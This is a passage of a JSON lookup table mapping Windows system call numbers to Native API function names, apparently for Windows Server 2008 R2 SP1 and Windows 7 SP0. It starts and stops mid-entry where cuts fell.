\"395\": \"NtWaitForDebugEvent\", \"396\": \"NtWaitForKeyedEvent\", \"397\": \"NtWaitForWorkViaWorkerFactory\", \"398\": \"NtWaitHighEventPair\", \"399\": \"NtWaitLowEventPair\", \"400\": \"NtWorkerFactoryWorkerReady\"}, \"R2 SP1\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAddBootEntry\", \"103\": \"NtAddDriverEntry\", \"104\": \"NtAdjustGroupsToken\", \"105\": \"NtAlertResumeThread\", \"106\": \"NtAlertThread\", \"107\": \"NtAllocateLocallyUniqueId\", \"108\": \"NtAllocateReserveObject\", \"109\": \"NtAllocateUserPhysicalPages\", \"110\": \"NtAllocateUuids\", \"111\": \"NtAlpcAcceptConnectPort\", \"112\": \"NtAlpcCancelMessage\", \"113\": \"NtAlpcConnectPort\", \"114\": \"NtAlpcCreatePort\", \"115\": \"NtAlpcCreatePortSection\", \"116\": \"NtAlpcCreateResourceReserve\", \"117\": \"NtAlpcCreateSectionView\", \"118\": \"NtAlpcCreateSecurityContext\", \"119\": \"NtAlpcDeletePortSection\", \"120\": \"NtAlpcDeleteResourceReserve\", \"121\": \"NtAlpcDeleteSectionView\", \"122\": \"NtAlpcDeleteSecurityContext\", \"123\": \"NtAlpcDisconnectPort\", \"124\": \"NtAlpcImpersonateClientOfPort\", \"125\": \"NtAlpcOpenSenderProcess\", \"126\": \"NtAlpcOpenSenderThread\", \"127\": \"NtAlpcQueryInformation\", \"128\": \"NtAlpcQueryInformationMessage\", \"129\": \"NtAlpcRevokeSecurityContext\", \"130\": \"NtAlpcSendWaitReceivePort\", \"131\": \"NtAlpcSetInformation\", \"132\": \"NtAreMappedFilesTheSame\", \"133\": \"NtAssignProcessToJobObject\", \"134\": \"NtCancelIoFileEx\", \"135\": \"NtCancelSynchronousIoFile\", \"136\": \"NtCommitComplete\", \"137\": \"NtCommitEnlistment\", \"138\": \"NtCommitTransaction\", \"139\": \"NtCompactKeys\", \"140\": \"NtCompareTokens\", \"141\": \"NtCompleteConnectPort\", \"142\": \"NtCompressKey\", \"143\": \"NtConnectPort\", \"144\": \"NtCreateDebugObject\", \"145\": \"NtCreateDirectoryObject\", \"146\": \"NtCreateEnlistment\", \"147\": \"NtCreateEventPair\", \"148\": \"NtCreateIoCompletion\", \"149\": \"NtCreateJobObject\", \"150\": \"NtCreateJobSet\", \"151\": \"NtCreateKeyTransacted\", \"152\": \"NtCreateKeyedEvent\", \"153\": \"NtCreateMailslotFile\", \"154\": \"NtCreateMutant\", \"155\": \"NtCreateNamedPipeFile\", \"156\": \"NtCreatePagingFile\", \"157\": \"NtCreatePort\", \"158\": \"NtCreatePrivateNamespace\", \"159\": \"NtCreateProcess\", \"160\": \"NtCreateProfile\", \"161\": \"NtCreateProfileEx\", \"162\": \"NtCreateResourceManager\", \"163\": \"NtCreateSemaphore\", \"164\": \"NtCreateSymbolicLinkObject\", \"165\": \"NtCreateThreadEx\", \"166\": \"NtCreateTimer\", \"167\": \"NtCreateToken\", \"168\": \"NtCreateTransaction\", \"169\": \"NtCreateTransactionManager\", \"170\": \"NtCreateUserProcess\", \"171\": \"NtCreateWaitablePort\", \"172\": \"NtCreateWorkerFactory\", \"173\": \"NtDebugActiveProcess\", \"174\": \"NtDebugContinue\", \"175\": \"NtDeleteAtom\", \"176\": \"NtDeleteBootEntry\", \"177\": \"NtDeleteDriverEntry\", \"178\": \"NtDeleteFile\", \"179\": \"NtDeleteKey\", \"180\": \"NtDeleteObjectAuditAlarm\", \"181\": \"NtDeletePrivateNamespace\", \"182\": \"NtDeleteValueKey\", \"183\": \"NtDisableLastKnownGood\", \"184\": \"NtDisplayString\", \"185\": \"NtDrawText\", \"186\": \"NtEnableLastKnownGood\", \"187\": \"NtEnumerateBootEntries\", \"188\": \"NtEnumerateDriverEntries\", \"189\": \"NtEnumerateSystemEnvironmentValuesEx\", \"190\": \"NtEnumerateTransactionObject\", \"191\": \"NtExtendSection\", \"192\": \"NtFilterToken\", \"193\": \"NtFlushInstallUILanguage\", \"194\": \"NtFlushInstructionCache\", \"195\": \"NtFlushKey\", \"196\": \"NtFlushProcessWriteBuffers\", \"197\": \"NtFlushVirtualMemory\", \"198\": \"NtFlushWriteBuffer\", \"199\": \"NtFreeUserPhysicalPages\", \"200\": \"NtFreezeRegistry\", \"201\": \"NtFreezeTransactions\", \"202\": \"NtGetContextThread\", \"203\": \"NtGetCurrentProcessorNumber\", \"204\": \"NtGetDevicePowerState\", \"205\": \"NtGetMUIRegistryInfo\", \"206\": \"NtGetNextProcess\", \"207\": \"NtGetNextThread\", \"208\": \"NtGetNlsSectionPtr\", \"209\": \"NtGetNotificationResourceManager\", \"210\": \"NtGetPlugPlayEvent\", \"211\": \"NtGetWriteWatch\", \"212\": \"NtImpersonateAnonymousToken\", \"213\": \"NtImpersonateThread\", \"214\": \"NtInitializeNlsFiles\", \"215\": \"NtInitializeRegistry\", \"216\": \"NtInitiatePowerAction\", \"217\": \"NtIsSystemResumeAutomatic\", \"218\": \"NtIsUILanguageComitted\", \"219\": \"NtListenPort\", \"220\": \"NtLoadDriver\", \"221\": \"NtLoadKey\", \"222\": \"NtLoadKey2\", \"223\": \"NtLoadKeyEx\", \"224\": \"NtLockFile\", \"225\": \"NtLockProductActivationKeys\", \"226\": \"NtLockRegistryKey\", \"227\": \"NtLockVirtualMemory\", \"228\": \"NtMakePermanentObject\", \"229\": \"NtMakeTemporaryObject\", \"230\": \"NtMapCMFModule\", \"231\": \"NtMapUserPhysicalPages\", \"232\": \"NtModifyBootEntry\", \"233\": \"NtModifyDriverEntry\", \"234\": \"NtNotifyChangeDirectoryFile\", \"235\": \"NtNotifyChangeKey\", \"236\": \"NtNotifyChangeMultipleKeys\", \"237\": \"NtNotifyChangeSession\", \"238\": \"NtOpenEnlistment\", \"239\": \"NtOpenEventPair\", \"240\": \"NtOpenIoCompletion\", \"241\": \"NtOpenJobObject\", \"242\": \"NtOpenKeyEx\", \"243\": \"NtOpenKeyTransacted\", \"244\": \"NtOpenKeyTransactedEx\", \"245\": \"NtOpenKeyedEvent\", \"246\": \"NtOpenMutant\", \"247\": \"NtOpenObjectAuditAlarm\", \"248\": \"NtOpenPrivateNamespace\", \"249\": \"NtOpenProcessToken\", \"250\": \"NtOpenResourceManager\", \"251\": \"NtOpenSemaphore\", \"252\": \"NtOpenSession\", \"253\": \"NtOpenSymbolicLinkObject\", \"254\": \"NtOpenThread\", \"255\": \"NtOpenTimer\", \"256\": \"NtOpenTransaction\", \"257\": \"NtOpenTransactionManager\", \"258\": \"NtPlugPlayControl\", \"259\": \"NtPrePrepareComplete\", \"260\": \"NtPrePrepareEnlistment\", \"261\": \"NtPrepareComplete\", \"262\": \"NtPrepareEnlistment\", \"263\": \"NtPrivilegeCheck\", \"264\": \"NtPrivilegeObjectAuditAlarm\", \"265\": \"NtPrivilegedServiceAuditAlarm\", \"266\": \"NtPropagationComplete\", \"267\": \"NtPropagationFailed\", \"268\": \"NtPulseEvent\", \"269\": \"NtQueryBootEntryOrder\", \"270\": \"NtQueryBootOptions\", \"271\": \"NtQueryDebugFilterState\", \"272\": \"NtQueryDirectoryObject\", \"273\": \"NtQueryDriverEntryOrder\", \"274\": \"NtQueryEaFile\", \"275\": \"NtQueryFullAttributesFile\", \"276\": \"NtQueryInformationAtom\", \"277\": \"NtQueryInformationEnlistment\", \"278\": \"NtQueryInformationJobObject\", \"279\": \"NtQueryInformationPort\", \"280\": \"NtQueryInformationResourceManager\", \"281\": \"NtQueryInformationTransaction\", \"282\": \"NtQueryInformationTransactionManager\", \"283\": \"NtQueryInformationWorkerFactory\", \"284\": \"NtQueryInstallUILanguage\", \"285\": \"NtQueryIntervalProfile\", \"286\": \"NtQueryIoCompletion\", \"287\": \"NtQueryLicenseValue\", \"288\": \"NtQueryMultipleValueKey\", \"289\": \"NtQueryMutant\", \"290\": \"NtQueryOpenSubKeys\", \"291\": \"NtQueryOpenSubKeysEx\", \"292\": \"NtQueryPortInformationProcess\", \"293\": \"NtQueryQuotaInformationFile\", \"294\": \"NtQuerySecurityAttributesToken\", \"295\": \"NtQuerySecurityObject\", \"296\": \"NtQuerySemaphore\", \"297\": \"NtQuerySymbolicLinkObject\", \"298\": \"NtQuerySystemEnvironmentValue\", \"299\": \"NtQuerySystemEnvironmentValueEx\", \"300\": \"NtQuerySystemInformationEx\", \"301\": \"NtQueryTimerResolution\", \"302\": \"NtQueueApcThreadEx\", \"303\": \"NtRaiseException\", \"304\": \"NtRaiseHardError\", \"305\": \"NtReadOnlyEnlistment\", \"306\": \"NtRecoverEnlistment\", \"307\": \"NtRecoverResourceManager\", \"308\": \"NtRecoverTransactionManager\", \"309\": \"NtRegisterProtocolAddressInformation\", \"310\": \"NtRegisterThreadTerminatePort\", \"311\": \"NtReleaseKeyedEvent\", \"312\": \"NtReleaseWorkerFactoryWorker\", \"313\": \"NtRemoveIoCompletionEx\", \"314\": \"NtRemoveProcessDebug\", \"315\": \"NtRenameKey\", \"316\": \"NtRenameTransactionManager\", \"317\": \"NtReplaceKey\", \"318\": \"NtReplacePartitionUnit\", \"319\": \"NtReplyWaitReplyPort\", \"320\": \"NtRequestPort\", \"321\": \"NtResetEvent\", \"322\": \"NtResetWriteWatch\", \"323\": \"NtRestoreKey\", \"324\": \"NtResumeProcess\", \"325\": \"NtRollbackComplete\", \"326\": \"NtRollbackEnlistment\", \"327\": \"NtRollbackTransaction\", \"328\": \"NtRollforwardTransactionManager\", \"329\": \"NtSaveKey\", \"330\": \"NtSaveKeyEx\", \"331\": \"NtSaveMergedKeys\", \"332\": \"NtSecureConnectPort\", \"333\": \"NtSerializeBoot\", \"334\": \"NtSetBootEntryOrder\", \"335\": \"NtSetBootOptions\", \"336\": \"NtSetContextThread\", \"337\": \"NtSetDebugFilterState\", \"338\": \"NtSetDefaultHardErrorPort\", \"339\": \"NtSetDefaultLocale\", \"340\": \"NtSetDefaultUILanguage\", \"341\": \"NtSetDriverEntryOrder\", \"342\": \"NtSetEaFile\", \"343\": \"NtSetHighEventPair\", \"344\": \"NtSetHighWaitLowEventPair\", \"345\": \"NtSetInformationDebugObject\", \"346\": \"NtSetInformationEnlistment\", \"347\": \"NtSetInformationJobObject\", \"348\": \"NtSetInformationKey\", \"349\": \"NtSetInformationResourceManager\", \"350\": \"NtSetInformationToken\", \"351\": \"NtSetInformationTransaction\", \"352\": \"NtSetInformationTransactionManager\", \"353\": \"NtSetInformationWorkerFactory\", \"354\": \"NtSetIntervalProfile\", \"355\": \"NtSetIoCompletion\", \"356\": \"NtSetIoCompletionEx\", \"357\": \"NtSetLdtEntries\", \"358\": \"NtSetLowEventPair\", \"359\": \"NtSetLowWaitHighEventPair\", \"360\": \"NtSetQuotaInformationFile\", \"361\": \"NtSetSecurityObject\", \"362\": \"NtSetSystemEnvironmentValue\", \"363\": \"NtSetSystemEnvironmentValueEx\", \"364\": \"NtSetSystemInformation\", \"365\": \"NtSetSystemPowerState\", \"366\": \"NtSetSystemTime\", \"367\": \"NtSetThreadExecutionState\", \"368\": \"NtSetTimerEx\", \"369\": \"NtSetTimerResolution\", \"370\": \"NtSetUuidSeed\", \"371\": \"NtSetVolumeInformationFile\", \"372\": \"NtShutdownSystem\", \"373\": \"NtShutdownWorkerFactory\", \"374\": \"NtSignalAndWaitForSingleObject\", \"375\": \"NtSinglePhaseReject\", \"376\": \"NtStartProfile\", \"377\": \"NtStopProfile\", \"378\": \"NtSuspendProcess\", \"379\": \"NtSuspendThread\", \"380\": \"NtSystemDebugControl\", \"381\": \"NtTerminateJobObject\", \"382\": \"NtTestAlert\", \"383\": \"NtThawRegistry\", \"384\": \"NtThawTransactions\", \"385\": \"NtTraceControl\", \"386\": \"NtTranslateFilePath\", \"387\": \"NtUmsThreadYield\", \"388\": \"NtUnloadDriver\", \"389\": \"NtUnloadKey\", \"390\": \"NtUnloadKey2\", \"391\": \"NtUnloadKeyEx\", \"392\": \"NtUnlockFile\", \"393\": \"NtUnlockVirtualMemory\", \"394\": \"NtVdmControl\", \"395\": \"NtWaitForDebugEvent\", \"396\": \"NtWaitForKeyedEvent\", \"397\": \"NtWaitForWorkViaWorkerFactory\", \"398\": \"NtWaitHighEventPair\", \"399\": \"NtWaitLowEventPair\", \"400\": \"NtWorkerFactoryWorkerReady\"}}, \"Windows 7\": {\"SP0\": {\"0\": \"NtMapUserPhysicalPagesScatter\", \"1\": \"NtWaitForSingleObject\", \"2\": \"NtCallbackReturn\", \"3\": \"NtReadFile\", \"4\": \"NtDeviceIoControlFile\", \"5\": \"NtWriteFile\", \"6\": \"NtRemoveIoCompletion\", \"7\": \"NtReleaseSemaphore\", \"8\": \"NtReplyWaitReceivePort\", \"9\": \"NtReplyPort\", \"10\": \"NtSetInformationThread\", \"11\": \"NtSetEvent\", \"12\": \"NtClose\", \"13\": \"NtQueryObject\", \"14\": \"NtQueryInformationFile\", \"15\": \"NtOpenKey\", \"16\": \"NtEnumerateValueKey\", \"17\": \"NtFindAtom\", \"18\": \"NtQueryDefaultLocale\", \"19\": \"NtQueryKey\", \"20\": \"NtQueryValueKey\", \"21\": \"NtAllocateVirtualMemory\", \"22\": \"NtQueryInformationProcess\", \"23\": \"NtWaitForMultipleObjects32\", \"24\": \"NtWriteFileGather\", \"25\": \"NtSetInformationProcess\", \"26\": \"NtCreateKey\", \"27\": \"NtFreeVirtualMemory\", \"28\": \"NtImpersonateClientOfPort\", \"29\": \"NtReleaseMutant\", \"30\": \"NtQueryInformationToken\", \"31\": \"NtRequestWaitReplyPort\", \"32\": \"NtQueryVirtualMemory\", \"33\": \"NtOpenThreadToken\", \"34\": \"NtQueryInformationThread\", \"35\": \"NtOpenProcess\", \"36\": \"NtSetInformationFile\", \"37\": \"NtMapViewOfSection\", \"38\": \"NtAccessCheckAndAuditAlarm\", \"39\": \"NtUnmapViewOfSection\", \"40\": \"NtReplyWaitReceivePortEx\", \"41\": \"NtTerminateProcess\", \"42\": \"NtSetEventBoostPriority\", \"43\": \"NtReadFileScatter\", \"44\": \"NtOpenThreadTokenEx\", \"45\": \"NtOpenProcessTokenEx\", \"46\": \"NtQueryPerformanceCounter\", \"47\": \"NtEnumerateKey\", \"48\": \"NtOpenFile\", \"49\": \"NtDelayExecution\", \"50\": \"NtQueryDirectoryFile\", \"51\": \"NtQuerySystemInformation\", \"52\": \"NtOpenSection\", \"53\": \"NtQueryTimer\", \"54\": \"NtFsControlFile\", \"55\": \"NtWriteVirtualMemory\", \"56\": \"NtCloseObjectAuditAlarm\", \"57\": \"NtDuplicateObject\", \"58\": \"NtQueryAttributesFile\", \"59\": \"NtClearEvent\", \"60\": \"NtReadVirtualMemory\", \"61\": \"NtOpenEvent\", \"62\": \"NtAdjustPrivilegesToken\", \"63\": \"NtDuplicateToken\", \"64\": \"NtContinue\", \"65\": \"NtQueryDefaultUILanguage\", \"66\": \"NtQueueApcThread\", \"67\": \"NtYieldExecution\", \"68\": \"NtAddAtom\", \"69\": \"NtCreateEvent\", \"70\": \"NtQueryVolumeInformationFile\", \"71\": \"NtCreateSection\", \"72\": \"NtFlushBuffersFile\", \"73\": \"NtApphelpCacheControl\", \"74\": \"NtCreateProcessEx\", \"75\": \"NtCreateThread\", \"76\": \"NtIsProcessInJob\", \"77\": \"NtProtectVirtualMemory\", \"78\": \"NtQuerySection\", \"79\": \"NtResumeThread\", \"80\": \"NtTerminateThread\", \"81\": \"NtReadRequestData\", \"82\": \"NtCreateFile\", \"83\": \"NtQueryEvent\", \"84\": \"NtWriteRequestData\", \"85\": \"NtOpenDirectoryObject\", \"86\": \"NtAccessCheckByTypeAndAuditAlarm\", \"87\": \"NtQuerySystemTime\", \"88\": \"NtWaitForMultipleObjects\", \"89\": \"NtSetInformationObject\", \"90\": \"NtCancelIoFile\", \"91\": \"NtTraceEvent\", \"92\": \"NtPowerInformation\", \"93\": \"NtSetValueKey\", \"94\": \"NtCancelTimer\", \"95\": \"NtSetTimer\", \"96\": \"NtAcceptConnectPort\", \"97\": \"NtAccessCheck\", \"98\": \"NtAccessCheckByType\", \"99\": \"NtAccessCheckByTypeResultList\", \"100\": \"NtAccessCheckByTypeResultListAndAuditAlarm\", \"101\": \"NtAccessCheckByTypeResultListAndAuditAlarmByHandle\", \"102\": \"NtAddBootEntry\", \"103\": \"NtAddDriverEntry\", \"104\": \"NtAdjustGroupsToken\", \"105\": \"NtAlertResumeThread\", \"106\": \"NtAlertThread\", \"107\": \"NtAllocateLocallyUniqueId\", \"108\": \"NtAllocateReserveObject\", \"109\": \"NtAllocateUserPhysicalPages\", \"110\": \"NtAllocateUuids\", \"111\": \"NtAlpcAcceptConnectPort\", \"112\": \"NtAlpcCancelMessage\", \"113\": \"NtAlpcConnectPort\", \"114\": \"NtAlpcCreatePort\", \"115\": \"NtAlpcCreatePortSection\", \"116\": \"NtAlpcCreateResourceReserve\", \"117\": \"NtAlpcCreateSectionView\", \"118\": \"NtAlpcCreateSecurityContext\", \"119\": \"NtAlpcDeletePortSection\", \"120\": \"NtAlpcDeleteResourceReserve\", \"121\": \"NtAlpcDeleteSectionView\", \"122\": \"NtAlpcDeleteSecurityContext\", \"123\": \"NtAlpcDisconnectPort\", \"124\": \"NtAlpcImpersonateClientOfPort\", \"125\": \"NtAlpcOpenSenderProcess\", \"126\": \"NtAlpcOpenSenderThread\", \"127\": \"NtAlpcQueryInformation\", \"128\": \"NtAlpcQueryInformationMessage\", \"129\": \"NtAlpcRevokeSecurityContext\", \"130\": \"NtAlpcSendWaitReceivePort\", \"131\": \"NtAlpcSetInformation\", \"132\": \"NtAreMappedFilesTheSame\", \"133\": \"NtAssignProcessToJobObject\", \"134\": \"NtCancelIoFileEx\", \"135\": \"NtCancelSynchronousIoFile\", \"136\": \"NtCommitComplete\", \"137\": \"NtCommitEnlistment\", \"138\": \"NtCommitTransaction\", \"139\": \"NtCompactKeys\", \"140\": \"NtCompareTokens\", \"141\": \"NtCompleteConnectPort\", \"142\": \"NtCompressKey\", \"143\": \"NtConnectPort\", \"144\": \"NtCreateDebugObject\", \"145\": \"NtCreateDirectoryObject\", \"146\": \"NtCreateEnlistment\", \"147\": \"NtCreateEventPair\", \"148\": \"NtCreateIoCompletion\", \"149\": \"NtCreateJobObject\", \"150\": \"NtCreateJobSet\", \"151\": \"NtCreateKeyTransacted\", \"152\": \"NtCreateKeyedEvent\", \"153\": \"NtCreateMailslotFile\", \"154\": \"NtCreateMutant\", \"155\": \"NtCreateNamedPipeFile\", \"156\": \"NtCreatePagingFile\", \"157\": \"NtCreatePort\", \"158\": \"NtCreatePrivateNamespace\", \"159\": \"NtCreateProcess\", \"160\": \"NtCreateProfile\", \"161\": \"NtCreateProfileEx\", \"162\": \"NtCreateResourceManager\", \"163\": \"NtCreateSemaphore\", \"164\": \"NtCreateSymbolicLinkObject\", \"165\": \"NtCreateThreadEx\", \"166\": \"NtCreateTimer\", \"167\": \"NtCreateToken\", \"168\": \"NtCreateTransaction\", \"169\": \"NtCreateTransactionManager\", \"170\": \"NtCreateUserProcess\", \"171\": \"NtCreateWaitablePort\", \"172\": \"NtCreateWorkerFactory\", \"173\": \"NtDebugActiveProcess\", \"174\": \"NtDebugContinue\", \"175\": \"NtDeleteAtom\", \"176\": \"NtDeleteBootEntry\", \"177\": \"NtDeleteDriverEntry\", \"178\": \"NtDeleteFile\", \"179\": \"NtDeleteKey\", \"180\": \"NtDeleteObjectAuditAlarm\", \"181\": \"NtDeletePrivateNamespace\", \"182\": \"NtDeleteValueKey\", \"183\": \"NtDisableLastKnownGood\", \"184\": \"NtDisplayString\", \"185\": \"NtDrawText\", \"186\": \"NtEnableLastKnownGood\", \"187\": \"NtEnumerateBootEntries\", \"188\": \"NtEnumerateDriverEntries\", \"189\": \"NtEnumerateSystemEnvironmentValuesEx\", \"190\": \"NtEnumerateTransactionObject\", \"191\": \"NtExtendSection\", \"192\": \"NtFilterToken\", \"193\": \"NtFlushInstallUILanguage\", \"194\": \"NtFlushInstructionCache\", \"195\": \"NtFlushKey\", \"196\": \"NtFlushProcessWriteBuffers\", \"197\": \"NtFlushVirtualMemory\", \"198\": \"NtFlushWriteBuffer\", \"199\": \"NtFreeUserPhysicalPages\", \"200\": \"NtFreezeRegistry\", \"201\": \"NtFreezeTransactions\", \"202\": \"NtGetContextThread\", \"203\": \"NtGetCurrentProcessorNumber\", \"204\": \"NtGetDevicePowerState\", \"205\": \"NtGetMUIRegistryInfo\", \"206\": \"NtGetNextProcess\", \"207\": \"NtGetNextThread\", \"208\": \"NtGetNlsSectionPtr\", \"209\": \"NtGetNotificationResourceManager\", \"210\": \"NtGetPlugPlayEvent\", \"211\": \"NtGetWriteWatch\", \"212\": \"NtImpersonateAnonymousToken\", \"213\": \"NtImpersonateThread\", \"214\": \"NtInitializeNlsFiles\", \"215\": \"NtInitializeRegistry\", \"216\": \"NtInitiatePowerAction\", \"217\": \"NtIsSystemResumeAutomatic\", \"218\": \"NtIsUILanguageComitted\", \"219\": \"NtListenPort\", \"220\": \"NtLoadDriver\", \"221\": \"NtLoadKey\", \"222\": \"NtLoadKey2\", \"223\": \"NtLoadKeyEx\", \"224\": \"NtLockFile\", \"225\": \"NtLockProductActivationKeys\", \"226\": \"NtLockRegistryKey\", \"227\": \"NtLockVirtualMemory\", \"228\": \"NtMakePermanentObject\", \"229\": \"NtMakeTemporaryObject\", \"230\": \"NtMapCMFModule\", \"231\": \"NtMapUserPhysicalPages\", \"232\": \"NtModifyBootEntry\", \"233\": \"NtModifyDriverEntry\", \"234\": \"NtNotifyChangeDirectoryFile\", \"235\": \"NtNotifyChangeKey\", \"236\": \"NtNotifyChangeMultipleKeys\", \"237\": \"NtNotifyChangeSession\", \"238\": \"NtOpenEnlistment\", \"239\": \"NtOpenEventPair\", \"240\": \"NtOpenIoCompletion\", \"241\": \"NtOpenJobObject\", \"242\": \"NtOpenKeyEx\", \"243\": \"NtOpenKeyTransacted\", \"244\": \"NtOpenKeyTransactedEx\", \"245\": \"NtOpenKeyedEvent\", \"246\": \"NtOpenMutant\", \"247\": \"NtOpenObjectAuditAlarm\", \"248\": \"NtOpenPrivateNamespace\", \"249\": \"NtOpenProcessToken\", \"250\": \"NtOpenResourceManager\", \"251\": \"NtOpenSemaphore\", \"252\": \"NtOpenSession\", \"253\": \"NtOpenSymbolicLinkObject\", \"254\": \"NtOpenThread\", \"255\": \"NtOpenTimer\", \"256\": \"NtOpenTransaction\", \"257\": \"NtOpenTransactionManager\", \"258\": \"NtPlugPlayControl\", \"259\": \"NtPrePrepareComplete\", \"260\": \"NtPrePrepareEnlistment\", \"261\": \"NtPrepareComplete\", \"262\": \"NtPrepareEnlistment\", \"263\": \"NtPrivilegeCheck\", \"264\": \"NtPrivilegeObjectAuditAlarm\", \"265\": \"NtPrivilegedServiceAuditAlarm\", \"266\": \"NtPropagationComplete\", \"267\": \"NtPropagationFailed\", \"268\": \"NtPulseEvent\", \"269\": \"NtQueryBootEntryOrder\", \"270\": \"NtQueryBootOptions\", \"271\": \"NtQueryDebugFilterState\", \"272\": \"NtQueryDirectoryObject\", \"273\": \"NtQueryDriverEntryOrder\", \"274\": \"NtQueryEaFile\", \"275\": \"NtQueryFullAttributesFile\", \"276\": \"NtQueryInformationAtom\", \"277\": \"NtQueryInformationEnlistment\", \"278\": \"NtQueryInformationJobObject\", \"279\": \"NtQueryInformationPort\", \"280\": \"NtQueryInformationResourceManager\", \"281\": \"NtQueryInformationTransaction\", \"282\": \"NtQueryInformationTransactionManager\", \"283\": \"NtQueryInformationWorkerFactory\", \"284\": \"NtQueryInstallUILanguage\", \"285\": \"NtQueryIntervalProfile\", \"286\": \"NtQueryIoCompletion\", \"287\": \"NtQueryLicenseValue\", \"288\": \"NtQueryMultipleValueKey\", \"289\": \"NtQueryMutant\", \"290\": \"NtQueryOpenSubKeys\", \"291\": \"NtQueryOpenSubKeysEx\", \"292\": \"NtQueryPortInformationProcess\", \"293\": \"NtQueryQuotaInformationFile\", \"294\": \"NtQuerySecurityAttributesToken\", \"295\": \"NtQuerySecurityObject\", \"296\": \"NtQuerySemaphore\", \"297\": \"NtQuerySymbolicLinkObject\", \"298\": \"NtQuerySystemEnvironmentValue\", \"299\": \"NtQuerySystemEnvironmentValueEx\", \"300\": \"NtQuerySystemInformationEx\", \"301\": \"NtQueryTimerResolution\", \"302\": \"NtQueueApcThreadEx\", \"303\": \"NtRaiseException\", \"304\": \"NtRaiseHardError\", \"305\": \"NtReadOnlyEnlistment\", \"306\": \"NtRecoverEnlistment\", \"307\": \"NtRecoverResourceManager\", \"308\": \"NtRecoverTransactionManager\", \"309\": \"NtRegisterProtocolAddressInformation\", \"310\": \"NtRegisterThreadTerminatePort\", \"311\": \"NtReleaseKeyedEvent\", \"312\": \"NtReleaseWorkerFactoryWorker\", \"313\": \"NtRemoveIoCompletionEx\", \"314\": \"NtRemoveProcessDebug\", \"315\": \"NtRenameKey\", \"316\": \"NtRenameTransactionManager\", \"317\": \"NtReplaceKey\", \"318\": \"NtReplacePartitionUnit\", \"319\": \"NtReplyWaitReplyPort\", \"320\": \"NtRequestPort\", \"321\": \"NtResetEvent\", \"322\": \"NtResetWriteWatch\", \"323\": \"NtRestoreKey\", \"324\": \"NtResumeProcess\", \"325\": \"NtRollbackComplete\", \"326\": \"NtRollbackEnlistment\", \"327\": \"NtRollbackTransaction\", \"328\": \"NtRollforwardTransactionManager\", \"329\": \"NtSaveKey\", \"330\": \"NtSaveKeyEx\", \"331\": \"NtSaveMergedKeys\", \"332\": \"NtSecureConnectPort\", \"333\": \"NtSerializeBoot\", \"334\": \"NtSetBootEntryOrder\", \"335\": \"NtSetBootOptions\", \"336\": \"NtSetContextThread\", \"337\": \"NtSetDebugFilterState\", \"338\": \"NtSetDefaultHardErrorPort\", \"339\": \"NtSetDefaultLocale\", \"340\": \"NtSetDefaultUILanguage\", \"341\": 